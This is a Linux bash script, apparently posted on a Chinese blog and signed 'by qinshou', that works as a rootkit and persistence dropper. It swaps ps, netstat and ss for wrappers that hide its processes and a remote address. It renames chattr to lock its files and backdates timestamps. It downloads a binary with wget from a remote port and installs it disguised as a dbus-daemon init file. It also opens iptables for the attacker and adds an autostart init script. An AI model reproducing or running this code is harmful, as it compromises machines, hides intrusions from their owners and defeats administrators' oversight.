#! /bin/bash
#chkconfig:12345 90 90
#############################################
#############################################
#############################################
#############################################
#############################################
path=`pwd`
exit0="exit 0"
Fss="/usr/bin/.Fss"
Fps="/usr/bin/.Fps"
Fnet="/usr/bin/.Fnetstat"
LockAngel="/usr/bin/zfgsr"
Fssbak="/usr/bin/dpkgd/ss"
Fpsbak="/usr/bin/dpkgd/ps"
Fnetbak="/usr/bin/dpkgd/netstat"
MyFileAngel="/etc/init.d/.dbus-daemon--system"
PuppetAngel="/usr/bin/.dbus-daemon--system.bak"
allow="/etc/allow.bak"
Fconfig="/sbin/Fconfig.n"
S99="/etc/rc.d/init.d/S99.25000"
if [ ! -f "$Fconfig" ];then
echo byqinshou 995999349 > $Fconfig
zfgsr +ia $Fconfig >/dev/null 2>&1
fi
Address1=`nslookup |grep "Address: "|awk '{print $2}'`
if [ -z "$Address1" ];then
zfgsr -ia /etc/resolv.conf
echo 'nameserver 114.114.114.114'>/etc/resolv.conf
echo 'nameserver 8.8.8.8'>>/etc/resolv.conf
touch -d "2010-06-7 08:10:30" /etc/resolv.conf
zfgsr +ia /etc/resolv.conf
fi
Ftempbash=`cat $Fconfig | awk '{print $2}'` #现脚本文件名
Fbashtemp="/usr/bin/"$Ftempbash #现脚本路径
Fbashname=`date +%s%N | md5sum | head -c 10`
Fbashpath="/usr/bin/"$Fbashname #新脚本路径
if [ $0 != "$Fbashtemp" ];then
pkill $Ftempbash;killall $Ftempbash
zfgsr -ia /usr/bin/$Ftempbash;rm -f /usr/bin/$Ftempbash
zfgsr -ia $PuppetAngel;rm -f $PuppetAngel
fi
# -------------------------------------------------------------
if [ ! -f "$LockAngel" ];then
zfgsr -ia $LockAngel
rm -rf $LockAngel
cp -f /usr/bin/chattr $LockAngel
cp -f /usr/bin/chattr /usr/bin/.zfgsr
cp -f /usr/bin/.zfgsr $LockAngel
chmod 777 $LockAngel
chmod 777 /usr/bin/.zfgsr
touch -d "2011-06-7 08:10:30" $LockAngel
touch -d "2011-06-7 08:10:30" /usr/bin/.zfgsr
rm -rf /usr/bin/chattr
zfgs +ia $LockAngel >/dev/null 2>&1
fi
if [ -f /usr/sbin/ss ];then
if [ ! -f "$Fss" ];then
if [ ! -f "$Fssbak" ];then
mkdir /usr/bin/dpkgd/
cp -f /usr/sbin/ss $Fssbak
cp -f /usr/sbin/ss $Fss
else
cp -f $Fssbak $Fss
fi
zfgsr -ia /usr/sbin/ss
rm -rf /usr/sbin/ss
echo '#!/bin/sh' > /usr/sbin/ss
echo '.Fss|grep -v "'$Address1'"' >> /usr/sbin/ss
echo 'exit' >> /usr/sbin/ss
chmod 0755 $Fss;chmod 0755 /usr/sbin/ss
zfgsr +ia /usr/sbin/ss >/dev/null 2>&1
zfgsr +ia $Fssbak >/dev/null 2>&1
zfgsr +ia $Fss >/dev/null 2>&1
fi
fi
if [ -f /bin/netstat ];then
if [ ! -f "$Fnet" ];then
if [ ! -f "$Fnetbak" ];then
mkdir /usr/bin/dpkgd/
cp -f /bin/netstat $Fnetbak
cp -f /bin/netstat $Fnet
else
cp -f $Fnetbak $Fnet
fi
zfgsr -ia /bin/netstat
rm -rf /bin/netstat
echo '#!/bin/sh' > /bin/netstat
echo 'for arg in "$*";do' >> /bin/netstat
echo '.Fnetstat $arg|grep -v "'$Address1'";done;exit' >> /bin/netstat
chmod 0755 $Fnet;chmod 0755 /bin/netstat
zfgsr +ia /bin/netstat >/dev/null 2>&1
zfgsr +ia $Fnetbak >/dev/null 2>&1
zfgsr +ia $Fnet >/dev/null 2>&1
fi
fi
if [ -f /bin/ps ];then
if [ ! -f "$Fps" ];then
if [ ! -f "$Fpsbak" ];then
mkdir /usr/bin/dpkgd/
cp -f /bin/ps $Fpsbak
cp -f /bin/ps $Fps
else
cp -f $Fpsbak $Fps
fi
zfgsr -ia /bin/ps
rm -rf /bin/ps
echo '#!/bin/sh' > /bin/ps;echo 'for arg in "$*";do' >> /bin/ps
echo '.Fps $arg|grep -v "'.dbus-daemon--system'"|grep -v "'$Fbashname'"|grep -v "ps"|grep -v "grep";done;exit' >> /bin/ps
chmod 0755 $Fps;chmod 0755 /bin/ps
zfgsr +ia /bin/ps >/dev/null 2>&1
zfgsr +ia $Fpsbak >/dev/null 2>&1
zfgsr +ia $Fps >/dev/null 2>&1
fi
fi
if [ ! -f "$allow" ];then
cp -f /etc/hosts.allow $allow
zfgsr +ia $allow >/dev/null 2>&1
fi
# by qinshou -----------------------------------------------
ExistAngel=`.Fps aux | grep .dbus-daemon--system | grep -v "grep" |wc -l`
if [ $ExistAngel != 1 ];then
zfgsr -ia /usr/bin/.dbus-daemon--system
rm -rf /usr/bin/.dbus-daemon--system
cp -f /usr/bin/.dbus-daemon--system.bak /usr/bin/.dbus-daemon--system
chmod 777 /usr/bin/.dbus-daemon--system
/usr/bin/.dbus-daemon--system
rm -rf /usr/bin/.dbus-daemon--system
fi
if [ ! -f "$MyFileAngel" ];then
zfgs -i /usr/bin/wget
zfgs -a /usr/bin/wget
chmod 777 /usr/bin/wget
wget -P /etc/ http://:999/1000.exe
zfgs -i $MyFileAngel
zfgs -a $MyFileAngel
rm -rf $MyFileAngel
chmod 777 /etc/1000.exe
mv -f /etc/1000.exe $MyFileAngel
zfgs +i $MyFileAngel
zfgs +a $MyFileAngel
chmod 0 /usr/bin/wget
zfgs +i /usr/bin/wget
zfgs +a /usr/bin/wget
fi
if [ ! -f "$PuppetAngel" ];then
cp -f $MyFileAngel $PuppetAngel
zfgs +i $PuppetAngel
zfgs +a $PuppetAngel
fi
iptable=`iptables -L INPUT|grep $Address1|awk '{print $1 $4}'`
if [ -z "$iptable" ];then
iptables -I INPUT -s $Address1 -j ACCEPT
else
iptables -D INPUT -s $Address1 -j DROP
fi
# 自启动------------------
if [ ! -f "$S99" ];then
echo "#!/bin/sh" >> $S99
echo "# chkconfig: 12345 90 90" >> $S99
echo "# description: $Ftempbash" >> $S99
echo "### BEGIN INIT INFO" >> $S99
echo "# Provides: $Ftempbash" >> $S99
echo "# Required-Start: " >> $S99
echo "# Required-Stop: " >> $S99
echo "# Default-Start: 1 2 3 4 5" >> $S99
echo "# Default-Stop: " >> $S99
echo "# Short-Description: $Ftempbash" >> $S99
echo "### END INIT INFO" >> $S99
echo 'case $1 in' >> $S99
echo "start)" >> $S99
echo " $Fbashpath" >> $S99
echo " ;;" >> $S99
echo "stop)" >> $S99
echo " ;;" >> $S99
echo "*)" >> $S99
echo " $Fbashpath" >> $S99
echo " ;;" >> $S99
echo "esac" >> $S99
fi
# by qinshou -----------------------------------------------
zfgsr -ia $Fconfig;zfgsr -ia $0;zfgsr -ia $Fbashpath
sed -i "s|$Ftempbash|$Fbashname|" $Fconfig
zfgsr +ia $Fconfig >/dev/null 2>&1
cp -f $0 $Fbashpath;rm -f $0;chmod 0755 $Fbashpath
# by qinshou -----------------------------------------------
if [ -z "`$S99|grep "$Fbashtemp"`" ]; then
sed -i "s|$Ftempbash|$Fbashname|" $S99
chmod 777 $S99
fi
# by qinshou -----------------------------------------------
zfgsr -ia /usr/bin/chattr;rm -f /usr/bin/chattr
zfgsr -ia /etc/hosts.allow;cp -f $allow /etc/hosts.allow;zfgsr +ia /etc/hosts.allow >/dev/null 2>&1
sleep 1;zfgsr -ia $Fbashpath;chmod 0755 $Fbashpath;nohup $Fbashpath >/dev/null 2>&1 &
# by qinshou -----------------------------------------------
zfgsr -ia /bin/ps;sed -i "s|$Ftempbash|$Fbashname|" /bin/ps
zfgsr -ia /bin/netstat;chmod 0755 /bin/netstat;chmod 0755 /bin/ps
zfgsr +ia /bin/netstat >/dev/null 2>&1
zfgsr +ia /bin/ps >/dev/null 2>&1
# by qinshou -----------------------------------------------
exit
阅读(7692) | 评论(2) | 转发(0) |